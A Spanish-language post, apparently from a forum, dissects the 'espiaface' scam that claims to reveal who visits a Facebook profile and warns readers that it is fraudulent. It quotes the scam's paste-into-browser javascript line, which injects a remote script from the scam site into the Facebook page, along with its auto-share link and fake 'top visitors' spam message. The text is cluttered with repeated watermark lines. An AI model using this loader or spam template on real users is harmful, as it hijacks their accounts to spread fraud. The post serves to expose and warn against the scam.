Quien Visita Tu Perfil en Facebook! [Engaño Masivo]

LA VERDAD DE "Quien visita mi perfil en facebook" @KRON0S Odio que abusen de esta manera a las personas que no saben... @KRON0S Después de ver que algunas personas critican y usan el "supuesto" servicio del Facebook, que permite identificar quien ha visitado nuestro perfil, me entro la curiosidad -como siempre-, y entre a mirar como funciona y cuales son los resultados que esté servicio devuelve. @KRON0S - NO ME REPOSTEES! ¡¡¡VALORA MI TRABAJO!!! web externas colocar FUENTE @KRON0S - NO ME REPOSTEES! ¡¡¡VALORA MI TRABAJO!!! web externas colocar FUENTE Como primera impresión, dudo mucho que personas externas al grupo de desarrollo de facebook, sean capaces de hacer un script que permita identificar quien ha visitado mi perfil, si Facebook no lo tiene, es porque aún no se ha creado, así que de primera digo: "Es un #FAIL!". @KRON0S - NO ME REPOSTEES! ¡¡¡VALORA MI TRABAJO!!! web externas colocar FUENTE Miremos a ver que podemos sacar. @KRON0S - NO ME REPOSTEES! ¡¡¡VALORA MI TRABAJO!!! web externas colocar FUENTE Como primer paso, entramos a espiaface.com, pero verdaderamente esta localizado en inicio.espiaface.com, bien ahora miramos el código fuente y WTF!, esta de moda el uso de Clickjacking en Facebook. @KRON0S Ya entramos a la web y como segundo paso nos dice que copiemos algo y lo pegamos en la ventana de facebook, veamos de que se trata. @KRON0S - NO ME REPOSTEES! ¡¡¡VALORA MI TRABAJO!!! web externas colocar FUENTE 1 # 2 javascript:( 3 a = ( 4 b = document 5 ).createElement( 'script' ) 6 ).src = '//www.espiaface.com/app.js?' + Math.random(), b.body.appendChild( a );void( 0 ) @KRON0S - NO ME REPOSTEES! ¡¡¡VALORA MI TRABAJO!!! web externas colocar FUENTE @KRON0S WTF! porque se debe de engañar al usuario con cosas que seguramente él no entiende?. Decodifiquemos esto en palabras. @KRON0S De-Codificación: Lo que hace el código anterior es, en el elemento body, crear un script que tenga como dirección www.espiaface.com/app.js más un número generado aleatoriamente -aun no se para qué-. En conclusión, agrega un script externo. @KRON0S - NO ME REPOSTEES! ¡¡¡VALORA MI TRABAJO!!! web externas colocar FUENTE @KRON0S - NO ME REPOSTEES! ¡¡¡VALORA MI TRABAJO!!! web externas colocar FUENTE Ahora sigue el tercer paso, que es, el de dar click en me gusta, ¿Porque debo de dar me gusta al servicio antes de usarlo?, lógicamente, no debería de ser después de ver su funcionamiento?. En fin sigamos, vamos a analizarlo. @KRON0S - NO ME REPOSTEES! ¡¡¡VALORA MI TRABAJO!!! web externas colocar FUENTE @KRON0S - NO ME REPOSTEES! ¡¡¡VALORA MI TRABAJO!!! web externas colocar FUENTE @KRON0S @KRON0S 1 # 2 http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.espiaface.com%2F&src=sp 3 # @KRON0S @KRON0S @KRON0S Para esto no hay mucho que decir, sólo agrega en el estado la URL del servicio. @KRON0S Imagen 1: Compartir servicio. @KRON0S - NO ME REPOSTEES! ¡¡¡VALORA MI TRABAJO!!! web externas colocar FUENTE Como 4 y último paso nos dice que debemos hacer click en un boton para ir a la aplicación, que en realidad es un vinculo a espiaface.com/carga.php, pero WTF! se redirecciono a amigosenlineachat.com. o.O! @KRON0S Hasta ahora, ni se ha visto como es el funcionamiento para saber cuales amigos han visitado mi perfil, sólo nos queda el script del 2do paso, vamos a analizarlo. @KRON0S Usando una herramienta online para identar el código JavaScript, descubrí rápidamente de que siempre tira los mismos valores, tremendo FAIL! jajajajaa, solo saca algunos de nuestros amigos y los concatena con los valores establecidos, miremos. @KRON0S @KRON0S - NO ME REPOSTEES! ¡¡¡VALORA MI TRABAJO!!! web externas colocar FUENTE 1 # 2 /* 3 * NOTA: %tf% equivale al nombre de mi amigo. 4 */ 5 6 var postmessage = 'Top de visitantes de tu perfil de hoy: 7 %tf% - 19 visitas 8 %tf% - 16 visitas 9 %tf% - 15 visitas 10 %tf% - 13 visitas 11 Averigua tu tambien quien te esta mirando entrando en: espiaface.com 12 Funciona de verdad!'; 13 # @KRON0S - NO ME REPOSTEES! VALORA MI TRABAJO Hasta ahora y como lo dije en principio esto es un fraude, pero quiero ver como es que selecciona mis amigos para ordenarlos en las visitas, pero eso quizás lo haga en otra ocasión, tengo una aplicación que programar y no debo de perder el tiempo, aunque quede con una duda. @KRON0S Espero que ahora con esta pequeña explicación, no caigan en la trampa de aquellos que solo quieren hacer spam. @KRON0S - NO ME REPOSTEES! VALORA MI TRABAJO @KRON0S - NO ME REPOSTEES! VALORA MI TRABAJO --- SOLUCIÓN --- KRON0S dijo:Si te sale ese evento borralo. Luego entra a ejecutar y pon %temp% te saldrá una carpeta con muchos archivos y cosas....Borra todo...!!! ah y borra el historial de tu navegador, reinicia tu pc y listo.... fíjate si te funciona !